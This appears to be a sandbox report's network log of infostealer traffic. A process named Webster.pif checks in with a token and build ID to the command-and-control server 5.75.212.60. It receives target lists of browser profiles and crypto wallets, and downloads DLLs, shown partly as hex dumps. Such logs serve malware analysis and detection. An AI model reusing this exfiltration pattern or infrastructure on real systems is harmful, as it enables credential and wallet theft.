                                                                                Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 64171 | 5.75.212.60 | 443 | 5740 | C:\Users\user\AppData\Local\Temp\229536\Webster.pif
Timestamp | Bytes transferred | Direction | Data
2024-07-26 15:54:29 UTC | 322 | OUT | POST / HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----FBKFCFBFIDGCGDHJDBKF
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                Host: 5.75.212.60
                                                                                Content-Length: 331
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
2024-07-26 15:54:29 UTC | 331 | OUT
                                                                                Data Ascii: ------FBKFCFBFIDGCGDHJDBKFContent-Disposition: form-data; name="token"496dc57b17d61411b7bf4ccd72157a79------FBKFCFBFIDGCGDHJDBKFContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------FBKFCFBFIDGCGDHJDBKFCont
2024-07-26 15:54:31 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Fri, 26 Jul 2024 15:54:31 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
2024-07-26 15:54:31 UTC | 5685 | IN
                                                                                Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 64172 | 5.75.212.60 | 443 | 5740 | C:\Users\user\AppData\Local\Temp\229536\Webster.pif
Timestamp | Bytes transferred | Direction | Data
2024-07-26 15:54:32 UTC | 322 | OUT | POST / HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----GDHDAEBGCAAFIDGCGDHI
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                Host: 5.75.212.60
                                                                                Content-Length: 332
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
2024-07-26 15:54:32 UTC | 332 | OUT
                                                                                Data Ascii: ------GDHDAEBGCAAFIDGCGDHIContent-Disposition: form-data; name="token"496dc57b17d61411b7bf4ccd72157a79------GDHDAEBGCAAFIDGCGDHIContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------GDHDAEBGCAAFIDGCGDHICont
2024-07-26 15:54:32 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Fri, 26 Jul 2024 15:54:32 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
2024-07-26 15:54:32 UTC | 119 | IN
                                                                                Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 64173 | 5.75.212.60 | 443 | 5740 | C:\Users\user\AppData\Local\Temp\229536\Webster.pif
Timestamp | Bytes transferred | Direction | Data
2024-07-26 15:54:34 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----DAECGCGHCGHCAKECBKJK
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                Host: 5.75.212.60
                                                                                Content-Length: 5105
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
2024-07-26 15:54:34 UTC | 5105 | OUT
                                                                                Data Ascii: ------DAECGCGHCGHCAKECBKJKContent-Disposition: form-data; name="token"496dc57b17d61411b7bf4ccd72157a79------DAECGCGHCGHCAKECBKJKContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------DAECGCGHCGHCAKECBKJKCont
2024-07-26 15:54:36 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Fri, 26 Jul 2024 15:54:35 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
2024-07-26 15:54:36 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 64174 | 5.75.212.60 | 443 | 5740 | C:\Users\user\AppData\Local\Temp\229536\Webster.pif
Timestamp | Bytes transferred | Direction | Data
2024-07-26 15:54:35 UTC | 238 | OUT | GET /sqls.dll HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                Host: 5.75.212.60
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
2024-07-26 15:54:35 UTC | 261 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Fri, 26 Jul 2024 15:54:35 GMT
                                                                                Content-Type: application/octet-stream
                                                                                Content-Length: 2459136
                                                                                Connection: close
                                                                                Last-Modified: Friday, 26-Jul-2024 15:54:35 GMT
                                                                                Cache-Control: no-store, no-cache
                                                                                Accept-Ranges: bytes
2024-07-26 15:54:35 UTC | 16123 | IN
                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                                Data Ascii: D$$;|D$;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|
                                                                                2024-07-26 15:54:36 UTC16384INData Raw: 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                Data Ascii: 2@3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                                2024-07-26 15:54:36 UTC16384INData Raw: c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                Data Ascii: td|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                2024-07-26 15:54:36 UTC16384INData Raw: c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc
                                                                                Data Ascii: _^][YVt$W|$FVBhtw7t7Vg_^jjjh,g!t$
                                                                                2024-07-26 15:54:36 UTC16384INData Raw: 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b
                                                                                Data Ascii: ,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$
                                                                                2024-07-26 15:54:36 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10
                                                                                Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$$


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                8 | 192.168.2.6 | 64175 | 5.75.212.60 | 443 | 5740 | C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-07-26 15:54:38 UTC | 322 | OUT | POST / HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----AKEGDAKEHJDHIDHJJDAE
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                Host: 5.75.212.60
                                                                                Content-Length: 829
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
                                                                                2024-07-26 15:54:38 UTC | 829 | OUT | Data Ascii:
                                                                                ------AKEGDAKEHJDHIDHJJDAE
                                                                                Content-Disposition: form-data; name="token"

                                                                                496dc57b17d61411b7bf4ccd72157a79
                                                                                ------AKEGDAKEHJDHIDHJJDAE
                                                                                Content-Disposition: form-data; name="build_id"

                                                                                1a72eb06939ea478753d5c4df4b2bd32
                                                                                ------AKEGDAKEHJDHIDHJJDAE
                                                                                Cont
                                                                                2024-07-26 15:54:39 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Fri, 26 Jul 2024 15:54:38 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                2024-07-26 15:54:39 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 2ok0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                9 | 192.168.2.6 | 64176 | 5.75.212.60 | 443 | 5740 | C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-07-26 15:54:39 UTC | 322 | OUT | POST / HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----DBAEHCGHIIIDHIECFHJD
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                Host: 5.75.212.60
                                                                                Content-Length: 437
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
                                                                                2024-07-26 15:54:39 UTC | 437 | OUT | Data Ascii:
                                                                                ------DBAEHCGHIIIDHIECFHJD
                                                                                Content-Disposition: form-data; name="token"

                                                                                496dc57b17d61411b7bf4ccd72157a79
                                                                                ------DBAEHCGHIIIDHIECFHJD
                                                                                Content-Disposition: form-data; name="build_id"

                                                                                1a72eb06939ea478753d5c4df4b2bd32
                                                                                ------DBAEHCGHIIIDHIECFHJD
                                                                                Cont
                                                                                2024-07-26 15:54:40 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Fri, 26 Jul 2024 15:54:39 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                2024-07-26 15:54:40 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 2ok0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                10 | 192.168.2.6 | 64177 | 5.75.212.60 | 443 | 5740 | C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-07-26 15:54:40 UTC | 322 | OUT | POST / HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----HJDGHIJDGCBAAAAAFIJD
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                Host: 5.75.212.60
                                                                                Content-Length: 437
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
                                                                                2024-07-26 15:54:40 UTC | 437 | OUT | Data Ascii:
                                                                                ------HJDGHIJDGCBAAAAAFIJD
                                                                                Content-Disposition: form-data; name="token"

                                                                                496dc57b17d61411b7bf4ccd72157a79
                                                                                ------HJDGHIJDGCBAAAAAFIJD
                                                                                Content-Disposition: form-data; name="build_id"

                                                                                1a72eb06939ea478753d5c4df4b2bd32
                                                                                ------HJDGHIJDGCBAAAAAFIJD
                                                                                Cont
                                                                                2024-07-26 15:54:41 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Fri, 26 Jul 2024 15:54:41 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                2024-07-26 15:54:41 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 2ok0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                11 | 192.168.2.6 | 64178 | 5.75.212.60 | 443 | 5740 | C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-07-26 15:54:41 UTC | 241 | OUT | GET /freebl3.dll HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                Host: 5.75.212.60
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
                                                                                2024-07-26 15:54:42 UTC | 260 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Fri, 26 Jul 2024 15:54:42 GMT
                                                                                Content-Type: application/octet-stream
                                                                                Content-Length: 685392
                                                                                Connection: close
                                                                                Last-Modified: Friday, 26-Jul-2024 15:54:42 GMT
                                                                                Cache-Control: no-store, no-cache
                                                                                Accept-Ranges: bytes


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                12 | 192.168.2.6 | 64179 | 5.75.212.60 | 443 | 5740 | C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-07-26 15:54:44 UTC | 241 | OUT | GET /mozglue.dll HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                Host: 5.75.212.60
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
                                                                                2024-07-26 15:54:44 UTC | 260 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Fri, 26 Jul 2024 15:54:44 GMT
                                                                                Content-Type: application/octet-stream
                                                                                Content-Length: 608080
                                                                                Connection: close
                                                                                Last-Modified: Friday, 26-Jul-2024 15:54:44 GMT
                                                                                Cache-Control: no-store, no-cache
                                                                                Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.6 | 64180 | 5.75.212.60 | 443 | 5740 | C:\Users\user\AppData\Local\Temp\229536\Webster.pif

Timestamp | Bytes transferred | Direction | Data
2024-07-26 15:54:46 UTC | 242 | OUT | GET /msvcp140.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
Host: 5.75.212.60
Connection: Keep-Alive
Cache-Control: no-cache
2024-07-26 15:54:46 UTC | 260 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 26 Jul 2024 15:54:46 GMT
Content-Type: application/octet-stream
Content-Length: 450024
Connection: close
Last-Modified: Friday, 26-Jul-2024 15:54:46 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.6 | 64181 | 5.75.212.60 | 443 | 5740 | C:\Users\user\AppData\Local\Temp\229536\Webster.pif

Timestamp | Bytes transferred | Direction | Data
2024-07-26 15:54:48 UTC | 242 | OUT | GET /softokn3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
Host: 5.75.212.60
Connection: Keep-Alive
Cache-Control: no-cache
2024-07-26 15:54:48 UTC | 260 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 26 Jul 2024 15:54:48 GMT
Content-Type: application/octet-stream
Content-Length: 257872
Connection: close
Last-Modified: Friday, 26-Jul-2024 15:54:48 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
                                                                                Data Ascii: ]]USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4|
                                                                                2024-07-26 15:54:49 UTC16384INData Raw: c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18
                                                                                Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                15 | 192.168.2.6 | 64182 | 5.75.212.60 | 443 | 5740 | C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-07-26 15:54:50 UTC | 246 | OUT | GET /vcruntime140.dll HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                Host: 5.75.212.60
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
                                                                                2024-07-26 15:54:50 UTC | 259 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Fri, 26 Jul 2024 15:54:50 GMT
                                                                                Content-Type: application/octet-stream
                                                                                Content-Length: 80880
                                                                                Connection: close
                                                                                Last-Modified: Friday, 26-Jul-2024 15:54:50 GMT
                                                                                Cache-Control: no-store, no-cache
                                                                                Accept-Ranges: bytes


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                16 | 192.168.2.6 | 64183 | 5.75.212.60 | 443 | 5740 | C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-07-26 15:54:51 UTC | 238 | OUT | GET /nss3.dll HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                Host: 5.75.212.60
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
                                                                                2024-07-26 15:54:52 UTC | 261 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Fri, 26 Jul 2024 15:54:52 GMT
                                                                                Content-Type: application/octet-stream
                                                                                Content-Length: 2046288
                                                                                Connection: close
                                                                                Last-Modified: Friday, 26-Jul-2024 15:54:52 GMT
                                                                                Cache-Control: no-store, no-cache
                                                                                Accept-Ranges: bytes


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                17 | 192.168.2.6 | 64184 | 5.75.212.60 | 443 | 5740 | C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-07-26 15:54:55 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----ECGDBAEHIJKKFHIEGCBG
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                Host: 5.75.212.60
                                                                                Content-Length: 1025
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
                                                                                2024-07-26 15:54:55 UTC1025OUTData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 42 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 36 64 63 35 37 62 31 37 64 36 31 34 31 31 62 37 62 66 34 63 63 64 37 32 31 35 37 61 37 39 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 42 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 61 37 32 65 62 30 36 39 33 39 65 61 34 37 38 37 35 33 64 35 63 34 64 66 34 62 32 62 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 42 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 0d 0a 43 6f 6e 74
                                                                                Data Ascii: ------ECGDBAEHIJKKFHIEGCBGContent-Disposition: form-data; name="token"496dc57b17d61411b7bf4ccd72157a79------ECGDBAEHIJKKFHIEGCBGContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------ECGDBAEHIJKKFHIEGCBGCont
                                                                                2024-07-26 15:54:56 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Fri, 26 Jul 2024 15:54:56 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                2024-07-26 15:54:56 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 2ok0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                18 | 192.168.2.6 | 64185 | 5.75.212.60 | 443 | 5740 | C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-07-26 15:54:56 UTC | 322 | OUT | POST / HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----DAAAFBKECAKEHIEBAFIE
